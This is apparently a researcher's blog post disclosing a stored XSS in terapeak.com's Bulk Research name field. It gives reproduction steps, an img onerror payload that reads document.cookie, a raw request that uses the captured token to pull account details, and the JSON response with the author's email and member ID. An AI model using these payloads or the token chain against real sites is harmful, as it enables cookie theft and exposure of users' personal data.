Stored XSS to Full Information disclosure

Hello pals,

During research of terapeak.com I found that Bulk Research name is vulnerable to XSS attack.

Note:You need to subscribe for Terapeak Profession account.

POC:

Step 1: go to your account and click on Bulk Research.
Step 2: in box type anything and click on search.
Step 3: after that click on the save button.
Step 4: write your xss payload in bulk research name in my case i'm using 
"><img src=x onerror=prompt(document.cookie)> and click on save
Step 5: see the xss alert with user cookie and token.

After digging more I’ve found that by that token you can get full information of that user like:

Email Address, Full Name, Member ID, Subscription Type, and other info. as well

The request to get user details:

GET /services/users/information?token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1 HTTP/1.1
Host: sell.terapeak.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Length: 0
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json
Date: Mon, 07 Nov 2016 21:49:21 GMT
P3P: CP="Thanks IE"
Vary: Accept-Encoding
Content-Length: 5763
Connection: Close

{"success":true,"parameters":{},"results":{"lastName":"src=x","country":null,"subscriptions":[{"memberId":1257777,"subscriptionId":2039604,"externalSubscriptionId":"10003451257777","terapeakPackage":{"packageId":345,"packageName":"Terapeak_Professional"},"suspended":false,"cancelPending":false,"startDate":1478521710000,"nextPaymentDate":1479241543000,"deadBeat":false,"expectedCurrency":1,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2010523,"terapeakPackage":{"packageId":343,"packageName":"Terapeak_free_2014"},"suspended":false,"cancelPending":false,"startDate":1475504386000,"deadBeat":false,"expectedCurrency":1,"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2039610,"terapeakPackage":{"packageId":348,"packageName":"SEO_Professional"},"suspended":false,"cancelPending":false,"startDate":1478521996000,"nextPaymentDate":1479241977000,"deadBeat":false,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2039653,"terapeakPackage":{"packageId":351,"packageName":"MySales_Pro_eBay"},"suspended":false,"cancelPending":false,"startDate":1478524074000,"nextPaymentDate":1479244062000,"deadBeat":false,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"}],"address":null,"city":null,"postalCode":null,"owned_subscriptions":[{"memberId":1257777,"subscriptionId":2039604,"externalSubscriptionId":"10003451257777","terapeakPackage":{"packageId":345,"packageName":"Terapeak_Professional"},"suspended":false,"cancelPending":false,"startDate":1478521710000,"nextPaymentDate":1479241543000,"deadBeat":false,"expectedCurrency":1,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2010523,"terapeakPackage":{"packageId":343,"packageName":"Terapeak_free_2014"},"suspended":false,"cancelPending":false,"startDate":1475504386000,"deadBeat":false,"expectedCurrency":1,"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2039610,"terapeakPackage":{"packageId":348,"packageName":"SEO_Professional"},"suspended":false,"cancelPending":false,"startDate":1478521996000,"nextPaymentDate":1479241977000,"deadBeat":false,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2039653,"terapeakPackage":{"packageId":351,"packageName":"MySales_Pro_eBay"},"suspended":false,"cancelPending":false,"startDate":1478524074000,"nextPaymentDate":1479244062000,"deadBeat":false,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"}],"firstName":"<svg/onload=prompt(1)>","phoneNumber":null,"province":null,"owned_suspended_expired_subscriptions":[],"permissions":{"bulkResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"userManagement":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"subscriptions":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"productBooster":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayCompetitorResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"billings":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"automatedAlerts":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"EXPAND_SCORING_PARAMETERS":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"page_research_top_titles":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"OPTIMIZE_LISTING_SCORE":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"Listings":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"eBaySavedSearches":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"Home":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"productWorksheets":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayTitleBuilder":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"Settings":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"amazonSavedSearches":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"LISTING_QUICK_SEARCH":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"alibaba":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"page_research_top_sellers":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"linkedChannels":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"amazonProductResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayHotResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"productGallery":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"marketAnalysis":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayCategoryResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayProductResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"sourceProducts":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"search_365_days":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"]},"allowOptOut":false,"email":"shubhamgupta109.1995@gmail.com","memberId":1257777}}

Thank you!!

 

shubhamgupta

 

One thought on “Stored XSS to Full Information disclosure

Leave a Reply

Your email address will not be published. Required fields are marked *